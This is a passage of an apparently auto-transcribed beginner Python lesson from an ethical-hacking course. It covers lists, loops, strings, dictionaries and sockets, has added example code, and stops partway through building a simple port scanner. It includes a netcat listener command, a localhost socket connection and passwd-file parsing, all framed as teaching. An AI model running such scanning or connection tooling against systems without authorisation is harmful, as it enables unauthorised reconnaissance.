just did something like this, and we did save, let's print it out. What do you think is going to happen? It's going to print When Harry Met Sally, because it's going to stop at the 1. We never get to 1 here. Again, similar situation: when we have this set to 3, we never get to one; we stop at one. So we're going to grab everything before one, which is going to be just When Harry Met Sally. We could set this to 2 and we would grab The Hangover in this as well, and just to prove the concept here, so that I'm not crazy, you can see here The Hangover gets added in, because we get 0 and we grab 1.
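The indexing and slicing rules just described, plus the append and pop calls the transcript turns to next, as small functions over the same movie list. This is an added example, not the course's script; the function names are mine, and it adds two things the video does not show: a stop index past the end of the list is not an error, and `append()` returns `None`, so assigning its result throws the list away.

```python
# Added example (not from the course): list indexing, slicing, append and pop
# on the movie list from the transcript.

movies = ["When Harry Met Sally", "The Hangover",
          "The Perks of Being a Wallflower", "The Exorcist"]


def item_at(items, position):
    """Plain indexing: 0 is the first item, -1 the last, -2 the one before
    it (negative positions count back from the end)."""
    return items[position]


def items_between(items, start, stop):
    """items[start:stop]: start is included, stop is excluded, so you get
    stop - start items. A stop past the end just stops at the end."""
    return items[start:stop]


def items_from(items, start):
    """items[start:] with no stop runs to the end, however long the list."""
    return items[start:]


def items_before(items, stop):
    """items[:stop] grabs everything before `stop`: exactly `stop` items."""
    return items[:stop]


def last_two(items):
    """A negative start: the final two items, whatever the length."""
    return items[-2:]


def add_favorite(items, title):
    """append() changes the list in place and returns None, so writing
    `items = items.append(title)` would leave you with None instead of a
    list. Work on a copy here so the original list stays untouched."""
    grown = list(items)
    result = grown.append(title)   # result is None, grown has the new item
    assert result is None
    return grown


def remove_first_and_last(items):
    """pop() with no index removes the last item, pop(0) the first; each
    call hands back the item it removed."""
    trimmed = list(items)
    last = trimmed.pop()
    first = trimmed.pop(0)
    return first, last, trimmed


if __name__ == "__main__":
    print(item_at(movies, 0), "|", item_at(movies, -1))
    print(items_between(movies, 1, 3))       # two items: positions 1 and 2
    print(items_between(movies, 1, 100))     # same as movies[1:], no error
    print(items_before(movies, 2))
    print(add_favorite(movies, "Jaws"))
    print(remove_first_and_last(movies))
    print(len(movies))                       # still 4: copies were modified
```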
you could also think of this if you don't confuse yourself as grabbing two items out of the list but make sure you don't confuse yourself because if this number were to be like two through four then it would be something completely different right so you need to make sure that you understand where from the list that you're actually grabbing i'm just going to control z these back there you go so from here let's do two more tricks actually we'll do one more trick and then we'll move into some other items related to lists so if we say movies like this and we want to grab the very last item we can just put in a negative one and this will grab the absolute last item off the list that way like if you have a list that's 2 000 items long and you don't know where it ends you could just do negative one and it's going to grab the last item for you and then you can see there it grabs down the exorcist so cool little tricks you might not use these for a while and you probably won't see these come through at least in anything we're going to really do in the course but they're still incredibly useful to know about because they're they are included in the basics of python so if you're going to know the basics of python and you will use these sometime in your lifetime it's useful to know this kind of stuff so we can also do some things with lists as well we can print out the length of our list so we could say length of movies something like this and give that a go and you can see that there's four items in that list so we've seen length before with strings and it took every single character inside that string here it's taking every single amount of item inside a list and it's printing that out we could also append items to the list so we could say something like movies dot a pen and what if we really like jaws and we added that into our favorite movies you can't have too many favorite movies come on so let's go ahead and try printing that out and well we have to actually print it 
sorry movies that append and then we say print movies now and it should print out with jaws added in where do we think jaws is going to actually add itself into well if you said the end of the list you are correct so when we append something we append it to the very end of the list what if we wanted to delete something from the list we could say something like this movies.pop and print movies let's see what happens here and now we got rid of draws so when we append we append to the end of the list if we want to delete the very last item in the list we just use pop now if we wanted to delete something like the first item or the second item we could do movies.pop and let's say zero we print movies this will remove the very very first item in the list we should see when harry met sally disappear and there you go no longer is when harry met sally in our list so this is a quick way that we can remove these items and on the fly if we need to to get rid of this so the high level overview here and the thing that you really need to take away is that lists have brackets we're going to see something called dictionaries later we might see something called tuples later and they all look very very similar but here lists have brackets inside those brackets are what we have that are called items okay and there are many different ways to return items the reason that i'm showing you these different ways is so that you can get familiar with the syntax that we start our list or our items with zero and not one and that we can grab from these lists in different ways okay and this will come back into play later with how we can utilize the same kind of syntax with other items as well or other things in python so we can also utilize you know printing out length or we can do a dot append and add to the list or dot pop and there's a lot of different things we can do here to you know to append to these lists or remove from these lists etc so this is just the basics but hopefully what you take 
away from this is that lists have brackets and you know the items there are items in a list and they start with zero those are the key takeaways so in the next video we're going to briefly talk about tuples and then we're going to move on into looping so let's go ahead and do that okay let's briefly talk about tuples now tuples are like lists but they're not like lists so lists are what we call mutable meaning that they can be changed now tuples tuples are immutable they cannot be changed now for this course this is the last time you're going to be seeing tuples but it's important to define what they are so that you know them you know how to identify them and they're just in the back your mind as hey i know what a tuple is and that thing is immutable i can't change it once i have it so let's take a look at a tuple okay let's make a new line here and start a comment we get to say tuples do not change and also we can put parentheses like this because remember lists had brackets tuples have parentheses so we're going to say something like grades now we're going to have an item that won't change so we're going to define grades here as just a b c d and f which is common for the us grading system and this is an example of a tuple so again we have parentheses instead of brackets now if we were to go in here and we were to try to do a grades dot pop for example and try to remove one of these not going to be possible or a grades dot append we're not going to put something else in here this is immutable we cannot change this once we have it defined so we can go ahead and print out our grades and we could say print out grades let's print out a b and that will work and you can see now we printed a b so we have similar features or abilities that we did here but we cannot change it in any way so once we have this defined and set that's it for us so this is it i just wanted to quickly show you what a tuple is again we're not going to get into it at all in this course but it 
should be defined and we should know the difference between a list which is mutable versus a tuple which is immutable so in the next video we're going to get into looping so we've already covered looping in the bash scripting section of the course but we're going to go ahead and get into the python version of looping as well and make some more sense of it so i will catch you over in the next video now moving on to looping so we introduced looping in our bash scripting video and we took the four loops and we made one line for loops and those should be familiar to you so for loop is just a start to finish of an iterate right we wanted to run that ping scanner for example and we started at the 1 and we ended at 256 on our ip sweep now we're going to introduce that in python form and we're also going to introduce a while loop now the while loop is going to come back into play later on in this course especially when we get into the exploit development part of the course so a while loop just think of it that it executes as long as something is true so let's make a new section here we're going to do a new line as usual and we're just going to go ahead just say something like looping and let's go ahead and start with four loops so we'll do four loops and let's note that this is just the start to finish of and iterate okay so let's say for example that we have a list okay let's go back to list and we'll say vegetables and let's just throw some vegetables in there you can pick whatever you want i'm gonna do cucumber i'm gonna do spinach and how about cabbage okay and again your list can look however you want it to look now for this for loop we're going to say for x and remember same thing with bash x can be whatever you want to call it you can call this for veggies you can call whatever you want i just like to use a letter because it's simple to type out we're going to say for x in vegetables we're just going to print x and what do we think this is going to do this is going 
to go through this list right and so say for every item in vegetables i want you to print that out so we're going to grab cucumber we're going to grab spinach we're going to grab cabbage it's going to print print print so let's take a look at that let's go ahead and save it we'll run our script here you can see that it printed cucumber spinach and cabbage so again you've seen this before just a classic example of a for loop as long as we have something to iterate through we're iterating through a list here and remember before again we were like sequence one through two fifty five we iterated through that to do our ping sweep so we're just iterating through something that's it really basic now we also have while loops so we'll say while loops and these execute as long as true so later on you're going to see something that says while true will be capital while true we're going to do something don't worry about that right now for this example what we're going to do is we're going to say i equals one okay and so we set a variable i that's equal to 1. now let's do a while loop we're going to say well i is less than 10 i want you to go ahead and print out i and then we're going to iterate i plus equals 1. so this should all start tying together from what you saw earlier remember that we have the plus equals and we're adding 1 to something so what we're doing here is we're saying hey i equals 1 and you know what while i is less than 10 i want you to go ahead and print out i then we're going to say hey i is plus or equal to 1 so that means i is now going to be 2. then we're going to go back through this loop again now while 2 is less than 10 go ahead and print out that it's 2 make it 3. 
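The two loop forms from this lesson, as an added example that is not part of the course transcript: the for loop is applied to the ping-sweep iteration the lesson refers back to (a fixed start and finish over a /24), and the while loop is applied to a retry pattern that runs as long as attempts remain. The function names and the `192.168.1` prefix are assumptions made for the example; nothing is sent on the network.

```python
# Added example (not from the course): for loop = start-to-finish iterate,
# while loop = executes as long as a condition is true.

def sweep_addresses(prefix, start=1, end=254):
    """For loop: walk start..end and build one address per host.

    This is the Python form of the one-line bash ping-sweep loop.  The
    prefix (for example "192.168.1") is a constructed value; the function
    only builds strings, it does not ping anything.
    """
    addresses = []
    for host in range(start, end + 1):      # range stops before end, so add 1
        addresses.append(prefix + "." + str(host))
    return addresses


def retry_until(check, max_attempts):
    """While loop: keep trying as long as attempts remain.

    Runs while attempt < max_attempts, exactly like the lesson's
    'while i < 10', and stops early the moment check(attempt) is True.
    Returns the attempt number that succeeded, or -1 if the loop ran to
    its limit without success.
    """
    attempt = 0
    while attempt < max_attempts:           # executes as long as this is true
        attempt += 1                        # the same += increment as the lesson
        if check(attempt):
            return attempt
    return -1


if __name__ == "__main__":
    print(sweep_addresses("192.168.1", 1, 5))
    print(retry_until(lambda n: n == 3, 10))
```

Both functions return their result instead of only printing it, which is the habit worth picking up early: a loop whose result comes back as a value can be reused by the script that builds on it later.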
3 is less than 10 over and over and over and over until this condition is no longer true the second that this i becomes 10 this loop is now no longer true and it's going to stop so we're going to go ahead and save this here let's go ahead and print this out and you can see that we just printed one through nine as expected so you're gonna get to see these again you're gonna get examples of them again as of right now i just want you to understand that a for loop is an iterate and a while loop executes as long as true okay so don't worry about how they're used quite yet just understand what they are what they mean and then you're going to see them come up in practical examples later on it'll make a lot more sense as we go through it so we're gonna move on to the next video i'm gonna go ahead and catch you over there okay we are moving into i don't want to call it advanced python i just want to say more advanced than where we were before if previously we were in a 101 class we're moving kind of into some 102 material i wouldn't even call it 201 material this is just more advanced beginner stuff how about that so what we're going to do is we're going to go ahead and start a new script that way we can kind of have our new 102 section here and kind of improve upon what we've been doing a little bit so what i want you to do is i just want you to gedit and we'll just call this newscript.py put a little ampersand at the end as usual and we're just going to declare our #!/bin/python3 here if i can type it out #!/bin/python3 and we're going to go ahead and talk about our first concept which is going to be importing so importing is important when we say importing modules are existent in python right and we have a lot of them built in but there are these modules that are not built in but available to us for example a module called sys now sys does a lot of important things sys has to deal with anything related to system functions and parameters one system function and
parameter that we can do is something like printing out the version of python that we're running so we could say print sys.version okay now if we go to do that and we say save and we just go ahead and say python3 newscript.py you can see the name sys is not defined so we're getting an error here well that's because we haven't imported it so we can do is we can say import sys and up here we can go ahead and just give this a nice comment next to it and we can just say that sys is system functions and parameters okay and then let's go ahead and save this and now let's go and run it again now you can see that we are running python 3.7.5 rc1 and we have now successfully printed this out why did this work this worked because sys does not by default come imported some items already built in by default sys is not one of them but sys is very important and we're going to use it over and over again so you're going to see it a lot one of the most frequent if not the most frequent along with os is another one import os you're going to see a lot of that over and over so why are we going to see this well we have things like argv so argv is arguments so when you think about from the bash lesson like dollar sign one you know when we had an argument and we were doing our ping like our script dot sh and we had our ip address here as dollar sign one something along those lines well those are the same thing we just call it argv in python that's something another thing is if we want to say sys.exit which you're going to see again later in this course we do sys.exit that exits python cleanly we need sys.exit so you're going to see sys quite repeatedly on top of this there's more things that we can do with modules let's go ahead and delete this and let's say that we wanted to import another module called datetime now this does exactly what you think it does but what if we wanted to import a specific part of datetime we didn't want to import the whole thing we just want to
import one module we can say from datetime import datetime so we can do the same thing with sys we can import a specific part of sys or we can import all of sys so with datetime we're importing a specific part of it right and we can do something like print datetime.now something like that and it should print us the date time so do this you can see now today's date is 11 16 2019 and what time we're recording so we can also do another nifty feature when it comes to importing we can import with aliases so instead of from datetime import datetime we can say import datetime as something like dt you could say import with alias and instead of having to write datetime.now over and over and over something like that we can just write dt is shorter we know what it means and we don't have to write out datetime which is kind of lengthy so print it again you can see it still works so importing is important i'm going to say it again you need to know that we're going to be importing certain modules out of python most of these are built in there are occasional times you're going to have to go out and download something and put it in your library and import it that way but for the this course that we're doing you're only going to be importing from things that are pre-existing with python so not everything is automatically ready to go sometimes you have to import things in order to improve upon your script or do it make it do what you want to do so we're going to build off of this when we start writing our scripts and you're going to see this repeatedly you're going to also see this again when we do our exploit development part of the course so let's go ahead and move on we're going to move on to some advanced strings and we're going to get close to wrapping up here and start building out some cool little python scripts so i'll see you over in the next video okay let's talk about advanced strings so everything i'm going to show you is not going to be used in this course
but i still think it's important to know and there's some important syntax in here to know as well and just different ways to handle the information that is in front of you so let's go ahead and just print out a string or let's make a string first let's do a string of my name and we'll just say my name is heath and similar to before if we printed out our name we could say print my name and then if i wanted to print the first initial of my name or first letter in my name i would just do something like this right so this should be familiar and if we wanted to print out the last letter we could just say negative one this should be familiar to you from the list lesson so we go ahead and we print this we just say python3 and we do our new script again you can see that we have big h and a little h because my name both starts and ends in h so we could also do something like take a sentence and we could say sentence this is a sentence and if we wanted to print out the first word of the sentence we would have to know the amount of letters in it so we know here that there is one two three four so this would be zero through three so let's say if we wanted to print out sentence here and we knew zero through three so remember we don't have to put zero we could just put something like this and then if we did through three it would only cut off at the i remember we have to go one further from our list lesson and we'll be able to print out the word this we can do the same with sentence we could go forward a bunch if we want to or we could do a negative nine because this is nine characters long through something like a negative 9 through negative 1 would pull out that whole sentence or the word sentence i should say so we can manipulate data this way we can also split data so we could say something like print and do sentence dot split and this will split based on a delimiter now the delimiter here is by default a space and we covered delimiters in bash scripting and
we're just going to say hey every time there's a space i want you to split out the sentence let's take a look at what that looks like i made a mistake in my script i didn't spell sentence correctly which caused an error in the initial script so let's try that again so you see here it says this that's what we're expecting from this one and here we have this is a sentence it now breaks these out into individual words based on a delimiter so let's go a little bit further we can join a sentence as well so let's have a scenario here let's say we want to split a sentence out we'll say sentence split is equal to sentence dot split and now we just split out the sentence right and we're putting in this variable of sentence underscore split now we could also join a sentence so let's make a new variable and we'll call it sentence join and here we can just say based on a delimiter i want you to put a space in between everything here so every every time you see a word in this sentence split so let's go ahead and join anytime you see sentence split here and there's a new word in it i want you to go ahead and join those with a space and then we can go ahead and print out sentence join and let's see what happens here this is a sentence so i brought it all back for us so not only can we take away and delimit a sentence by splitting we can also join a sentence and add our own delimiter in there as well so one of the most important things that we need to talk about is what happens if we have a quote and we say something like he said give me all your money well we need to add quotations in here but if we do quotations like this well that's just making things really weird right look at the color of the script you can already tell it's going weird that's going to throw an error but we can use single quotes and double quotes and it'll work we could also use single quotes here double quotes inside double quotes on the outside single quotes on the inside and that's a way to have quotes 
inside of a string so let's go ahead and print that out but let's say that you were insistent and you wanted to have double quotes and then double quotes here well we could do a little bit of character escaping so we could utilize this backslash here and say hey we're going to keep this string a string and then i'm going to end it right here so this will tell me that from here to here ignore these characters right so we're going to treat it as a string don't treat it as a quotation and end of string so let's run it again and you can see that quote once we print it we could say print quote and we'll actually run it here he said give me all your money and i realized that i tried to print earlier and probably did not print this quote because i never had the print in there so i'm sorry for that but we could do it either way again we can put the single quotation in here and you'll see the single quote works but if we were to put in a double quotation it would break it so i'm going to control z a couple times and this is what the syntax should look like this is very very important if there's one thing you're going to take away from advanced strings please please take this away from it because you need to know how to do some character escaping and that you will encounter that again in your career so a couple more things let's say that we want to have a string here let's say we'll call the string too much space and we have something like hello and we just you know copied data put it into this and somehow too much space in here we can strip out the space so we can just print too much space here and we can do the same thing as we did before and do something like strip like this save it and look what happens now it's just going to print hello there's no space around it we're good to go so that's a nice little feature another feature that we should know is let's say we had something like print a in apple what's this going to return true what it's looking for is does a exists 
an apple well what if we did a lower case here try it again and you're going to see that it's false so it's very case sensitive well what about we wanted to say hey is there an a in the word apple and we don't know if it's capitalized not capitalized well we might say something instead like hey we're looking for a letter of a and we're looking for the word of apple right but what about we say print letter dot lower and then we say in word dot lower like this now this becomes improved because we're looking for a specific letter inside of specific word and when we lower case everything we lowercase this letter lowercase all these letters then we're looking for a specific letter in a word we don't have to worry about case sensitivity and you will see this logic come into play when you're thinking about looking for specific items or specific key phrases or matching anything specifics you might want to consider putting everything in a lower case and then trying to find it that way unless you are critical on case sensitivity so this will probably come up again in your career as you look at code so if we run that again now you can see that it returns back true so one more thing i'm going to show you and there's a lot of things that we can do with advanced strings i don't want to beat too much into it because i really feel that this can get into overkill because there's so many things and tips and tricks that i can show you but i really feel like some of this can be out of scope for the course but i do think that as long as you're taking good notes and it's valuable now you're gonna have that as something to remember and look back upon as you do more python development so one more thing is a format so let's say that your favorite movie is the hangover and we'll just keep that as a string and let's just say something like print my favorite movie now we have done in the past is and we could just say something like this plus you know a string if it's not a string or we just 
say movie right and then we'd have to add a period in here something along those lines we can improve upon this we could say my favorite movie is and then we can just add a little placeholder here and then put a period now what we do after this is we just say dot format and then we say movie and now it knows to put in the movie that we have here or the variable that we have stored in movie it knows to put it into these brackets here we save this and watch what happens my favorite movie is the hangover so you don't have to do a bunch of spacing and if things get weird you know with with your your string or you know how to write out your sentence it's very easy to just have these placeholders and then if things change you know it just updates easily so this is a very nice way to hold things in a placeholder without making these weird formatting changes so i i like this method as opposed to the concatenation method that i showed you in our first video on strings so if you're going to take away some things today just take away that you know we have different ways of doing things we've shown you with the list before the zero and the negative one i told you it was going to come up again just know that again zero is the first item or first letter or first whatever when we're talking about python and we're talking about our variables lists strings always start with a zero there's different ways to do the same thing and apply them across other items right so i've shown you this with lists i've shown you this with strings so get those wheels spinning and think about how you can utilize some things now sentence has all different kinds of methods that we can use with it and again we're just touching back on methods and making it a little bit more advanced but you see that we can split a sentence we can join a sentence we can strip a sentence or we can strip a string so understanding that there are a lot of cool methods uh the lower method we could do an upper method we've 
talked about those as well knowing the different types of methods per se like a string or per class or however you want to combine it together is important as well so always do your research when you are looking into you know how can i improve it so if you're saying like hey is there a way to make something uppercase just go to google and say hey how do i make a string all uppercase and of course it's dot upper but if you didn't know that then you know the google machine would know that for you and a lot of your code is going to be found on stack exchange or on google et cetera so just be aware that these things exist and be aware that there are better ways to format your strings and there are important syntax when it comes to escaping your quotations as well so that's it for this lesson we're going to have a couple more little lessons here and then we're going to move into script building and then we'll be starting our hacking journey so i'll catch you over in the next video alright we are in the home stretch everybody so we're going to cover dictionaries now and when we think of dictionaries we need to think of key value pairs so let's go ahead and make a new section called dictionaries and we'll just note key value pairs probably put a slash here key value pairs and we'll also put a little note of curly braces like this so let's talk dictionaries so let's say we have a dictionary and we want to have a menu let's make a drink menu again make this however you want i'm going to make this based on some alcoholic beverages you can absolutely make this more you know pg or pg-13 or however you want to make it but let's say a white russian we go to a bar there's a white russian on the menu and that white russian costs seven dollars and there's also an old fashion and we just say that's ten bucks and then we have a lemon drop which is eight dollars so we've got these and we'll close off this with a curly bracket and this is what a dictionary looks like so if you were to
print out drinks we would return our dictionary let's do that if i would make this the correct syntax this would work very well for me i am human after all so you see here white russian 7 old fashioned 10 lemon drop 8. so what you can note here is that the drink is your key and your price is your is your value so you have your key value pair here so key value key value key value well think of it as another way we don't have to just have one parameter or one value we have to have a key we can have multiple values to a key so let's talk about employees and i'm going to use one of my favorite tv show which is bob's burgers to do this so let's say we have employees and we have different departments so let's say we have a finance department okay and inside the finance department we've got bob we've got linda and we've got tina so we got three employees in the finance department then we've got an it department and inside of it there might be gene and louise we'll add teddy to this too why not i'm gonna have to move this over because it's a little bit long and then let's do one more department let's say there's a department of hr our favorite department and we'll say there's jimmy jr and mort all right so this is our dictionary now again we can print out employees and we should be able to see our dictionary here save this give it a print okay you can see finance has bob linda tina it has gene louise and teddy and jimmy jr and mort are in hr i'm gonna fix this typo and all right so let's say that we want to add a new key value pair well we can say let's say there's a new department and we could say there's a new department called legal so employees and let's add in legal and then we'll say in legal there is mr frond all right and this will add a new key value pair something like this all right so we'll save this go ahead and just print it and if i were to write print afterwards print employees and we'll save it let's print it one more time now you see that legal has been
added with mr frond working in legal okay let's do another let's say that we've added somebody to the sales team and let's do it this way we didn't have a sales team before but we do now so we can also do an update something like this we could say update and then we can add in sales and we can say hey we've got a nice new sales team of andy and ollie and it'll look something like this so now we print out employees we should have andy and ollie on the sales team as well so there's multiple ways to add in new key value pairs so we can copy this and paste it over here as a key value as well so we can also update things this is last thing i'm going to show you we can also update things so we could say let's go back to our drinks let's say that we've got the white russian let's say the white russian is no longer seven dollars our menu has changed and it's now eight dollars so we're gonna make eight dollars then we'll just print out drinks and we can save that print it and now you can see the white russian is now eight dollars instead of seven from before we can also get some items out of a dictionary so we say print drinks dot get and we'll just get the white russian and let's see what that returns so you can pull specifically from a dictionary here and you see that the white russian has a value of 8. 
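The string methods from the advanced strings lesson (strip, split, join, lower with `in`, format, escaped quotes) and the dictionary operations from this lesson (key/value pairs, a list as a value, adding a key, update, changing a value, get) put to work together, as an added example that is not part of the course. It parses a few constructed `/etc/passwd`-style lines and groups the users by login shell, which is the kind of check you do when auditing which accounts can actually log in. The line contents, function names and shell paths are all assumptions made for the example.

```python
# Added example (not from the course): advanced string methods plus
# dictionary operations on constructed /etc/passwd-style lines.

RAW_LINES = [                                               # constructed sample data
    "  root:x:0:0:root:/root:/bin/bash  ",                  # stray whitespace, like pasted text
    "alice:x:1000:1000:Alice:/home/alice:/bin/zsh",
    "svc-backup:x:1001:1001:Backup:/var/backups:/usr/sbin/nologin",
    "bob:x:1002:1002:Bob:/home/bob:/bin/bash",
]


def parse_passwd_line(line):
    """Turn one passwd line into a (user, uid, shell) tuple.

    strip() drops the surrounding whitespace, split(":") uses the colon as
    the delimiter instead of the default space, and indexing picks fields
    out of the resulting list: 0 is the user, 2 the uid, -1 the last field.
    """
    fields = line.strip().split(":")
    return (fields[0], int(fields[2]), fields[-1])


def rebuild_line(fields):
    """join() is the reverse of split(): put the colon delimiter back."""
    return ":".join(fields)


def users_by_shell(lines):
    """Dictionary with the shell as key and a list of users as the value.

    setdefault(key, []) returns the existing list for that key or inserts
    a new empty one, so the append works whether or not the key exists yet.
    """
    grouped = {}
    for line in lines:
        user, _uid, shell = parse_passwd_line(line)
        grouped.setdefault(shell, []).append(user)
    return grouped


def users_with_shell(lines, keyword):
    """Case-insensitive match: lower() both sides before testing with 'in'."""
    matches = []
    for line in lines:
        user, _uid, shell = parse_passwd_line(line)
        if keyword.lower() in shell.lower():
            matches.append(user)
    return matches


def describe(entry):
    """format() fills the {} placeholders; the inner double quotes are escaped."""
    user, uid, shell = entry
    return "User \"{}\" (uid {}) logs in with {}".format(user, uid, shell)


def apply_shell_policy(grouped, old_shell, new_shell):
    """Dictionary edits: get() with a default, deleting a key, update().

    Returns a new dictionary in which everyone listed under old_shell is
    moved under new_shell (for example, moving accounts to a nologin shell).
    The input dictionary is copied first so it is left unchanged.
    """
    updated = dict(grouped)
    moved = updated.get(old_shell, [])              # [] if old_shell is not a key
    if old_shell in updated:
        del updated[old_shell]
    updated.update({new_shell: updated.get(new_shell, []) + moved})
    return updated


if __name__ == "__main__":
    grouped = users_by_shell(RAW_LINES)
    print(grouped)
    print(users_with_shell(RAW_LINES, "BASH"))
    print(describe(parse_passwd_line(RAW_LINES[0])))
    print(apply_shell_policy(grouped, "/bin/zsh", "/usr/sbin/nologin"))
```

Note that `users_with_shell` lowercases both the keyword and the field, exactly as the lesson suggests for matching when case does not matter, while the dictionary keys in `users_by_shell` keep the shell path as written, because a path is one of the places where case does matter.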
so this is it for dictionaries you're not going to really see it come up in this course but again this is another valuable thing with python to know so we have covered lists which have brackets like this we've covered tuples which have parentheses and then now we have covered dictionaries which have the curly braces and now when you're reading code you should be able to identify all them differently this is why this was important everything has been building upon up until this point right so now you should identify okay i see those curly braces you know that's going to be a dictionary or i see these these brackets here that's going to be a list so keep that in mind and moving forward you should be able to now start reading this code and understanding this code and from the beginning i told you we don't have to be developers but we do have to be able to read code so the more i show you the better off that you're going to be so we're going to wrap up this lesson we've got a couple more before we start building our scripts and we'll be uh be good to go and move into hacking so i will catch you over in the next lesson welcome to your final module before we start working on scripts so this last module is a very important one because we have to define what sockets are so we're going to be using sockets to connect two nodes together really that's it and more layman's terms we're doing is we're going to use sockets to connect to an open port and ip address so you're going to see this when we build a port scanner you're also going to see this later on in the exploit development portion of the course where we have to reach out to a specific port and ip address establish a connection and send malicious data so what we're going to do here is we're going to just build out a simple socket script and we're going to connect to an open port with that script and it'll start to make sense and then when you see it in the next video when we build out the port scanner make a little bit 
more sense and you see it again in the course you're gonna say hey i remember that we use sockets for connecting two ports so here's what we're gonna do we're going to make a file and call the file s.py you can call it whatever you want just do not call it socket.py if you call it socket.py you're going to run into issues because it's going to think it is a socket so we need to define a couple of things first so we're going to do is we're going to of course shebang up top do our #!/bin/python3 and we're going to import socket so remember importing is important we have to import socket up here at the top now let's define a couple of variables so the first variable we're going to say is host and we're just going to give that our local address here of one two seven zero zero one this is our localhost and we're going to define port and i'm just going to give mine all sevens you can give it whatever you'd like here and i'm going to define another variable like this s equals socket.socket socket.AF_INET socket.SOCK_STREAM now this looks long and intimidating please do not be intimidated by this we are just making our life easier on ourselves so we're defining a variable that stores all this into one and this is very very common when it comes to sockets your the syntax here is very common so we're saying is hey we want s to equal socket.socket and this socket.AF_INET socket.SOCK_STREAM so AF_INET just think about that as ipv4 we're connecting over an ipv4 connection socket.SOCK_STREAM you could just think of this as a port so AF_INET ipv4 SOCK_STREAM it's a port so let's say we want to make a connection we're going to say s dot connect now connect is just another part of the socket module so we're going to make a connection here and so if you think about this we're using all this and then dot connect right so we're declaring this and then we have these two parameters here socket.AF_INET socket.SOCK_STREAM so the AF_INET we need to say hey let's make
this a our host variable and then this one our port variable and we could in theory just put in seven seven seven seven and one two seven zero zero one but it's just easier to find those in a variable up top and then use them later to connect so i'm gonna go ahead and save this and then i'm going to open up a new terminal in a new window here and i'm going to utilize a tool that we have not used before and this tool is called netcat and we'll use this later on in the course quite a bit so we'll say netcat and i'm just going to say -nvlp this means i'm going to establish a listening port i'm going to listen on port 7777 for connection so you see here it says hey we're listening on any interface for all sevens you don't have to worry too much about this right now we're gonna go into detail on netcat at a later time but all we're doing right now is we're waiting for anybody to connect to us now here we're sitting at our local host of one two seven zero zero one so we need to establish that connection which is what we're going to do with this script now the script does nothing it establishes a connection and that is it so let's go ahead and take a quick look we're just going to say python3 s.py do that come over here and you see that we had an established connection made and then the connection closed we didn't tell it to do anything there's nothing here to say hey keep this connection open send over some data do anything at all we just said hey make a connection really quick and it did it made a connection from one two seven zero zero one to one two seven zero zero one we connected to ourselves but with this script we have successfully achieved what we wanted to which was to utilize sockets to connect one node to another node that's it so we're going to build upon this whole thing here in the next lesson we're going to build a port scanner it's going to be a bad port scanner but it's still going to be a great lesson so let's go ahead and just take a look at that port
scanner and i'll catch you in the next video all right welcome to the last video in our python module so now we're going to be making a port scanner and you heard me saying last video that it's going to be a terrible port scanner and it is but it's going to be a functional port scanner as well and we'll talk about what we can do to improve it and how we can think this through so what we're going to do is we're going to go ahead and open up a gedit here so i'm going to say gedit and we'll just go ahead and call this scanner.py and we'll do the ampersand at the end and let's go ahead and declare that this is going to be python3 and now let's talk through some things so there's going to be a lot of familiarity everything i've done up until this point has been for a reason and you're going to start to see it all tied together so the end goal of this project is going to be that we run something along the lines of python3 scanner.py and we provide an ip address here now with that ip address it's going to go ahead and scan through a selected port range for us and try to return back results whether or not the port is open so we're just checking if a port is open on a machine so to do that we're going to need a few things so first of all we're going to need to import sys we're going to import socket as we are going to make a node to node connection and we're going to import datetime from datetime as we're going to make a pretty little banner as well so why was sys important i told you sys would come back into play so we have here an argument so there are actually two arguments in theory argument zero is that we're running scanner.py argument one is that we are running against an ip address now since we're building this script out we want it to take two arguments and only two arguments so we're going to build that into our script from the get go so let's go ahead and just define our target and it's always good when you're building out a script to have good notes in
there as well so not only that you can go back and read it but if you send this to somebody else they could also read through it as well so put good comments in here good notes saying what you're doing so in this instance we're going to put an if statement again conditional argument here we're going to say if the length of sys.argv remember this is the same thing as like a dollar sign one in bash we're going to take that we're going to say if it's equal to 2 we're going to go ahead and do something and what we're going to do is we're going to declare a variable of target and we're going to say socket get host by name and then we're going to get sys.argv 1 so we're taking the first argument again this is same thing as dollar sign one like this in bash why are we doing this well we're just translating a hostname here to ipv4 now this is not inherently necessary we could just declare the target by input it could just be target equals sys.argv 1 but we're just taking an extra step here in case instead of somebody putting in an ip address they could just put in like a hostname say we have a host here and it's you know like one of mine is called the punisher you know what if they put in punisher well if that punisher name does dns and it resolves to an ip address it's going to go ahead and do that with this argument here so we're just putting in an extra step thinking ahead we also need an else to this so if it doesn't equal two if it's three if it's one if it's none then we're going to go ahead and just print out and say invalid amount of arguments and then we can actually take this here and we can put this into a print statement as well let's print just say something like syntax python 3 scanner ip address something along those lines okay so i always like to save it and then just run it and make sure everything works fine so let's go ahead and give it python3 we'll say scanner.py and we'll give it no argument and it's going to say okay invalid amount arguments syntax is
python3 scanner.pi ip so we'll just give it an argument here okay so it runs didn't get the we met the conditions and we set the target variable to well to this right so that's okay for now so let's go ahead and i like to always put in a pretty little banner or something you know so let's add a pretty banner and i'm just gonna do something like this i'm going to say print and we're going to do dashes we'll do 50 dashes and then we'll go ahead i'm going to copy this just a little bit easier and let's go ahead and print a couple things we'll say print we'll say scanning target and then we'll add a space and let's do plus target and then we'll say print time started and then we can just do a space there plus the string of date time dot now now that came back into play as well so make sure you have three closing parenthesis so we've now utilized sys socket and date time all of which we have seen in the past and then that last copy paste here for the banner so let's go ahead and save this and give it another go and you can see it says okay scanning target and it's resolving to this 23 this is this is not accurate but you know just let it do its thing um and then it's got the time started of the scan here so you can see here i'm putting in a hostname and it's trying to resolve to dns to this uh maybe this is how what it resolves to i don't know but we'll move on so the next thing we're going to do is what is called a try statement so we're going to try to do something and if we can't do it we have exceptions so you'll see what this looks like when it's all built out so go ahead and type try and you're going to see try later as well when we get into the exploit development so we're gonna do a four statement so four port in range now we need to specify the range if we were going to do a full on port scanner we would do for port 1 through 65 535 okay that will take forever we'll talk about why i told you this was a bad port scanner we'll talk about why we're not going to do 
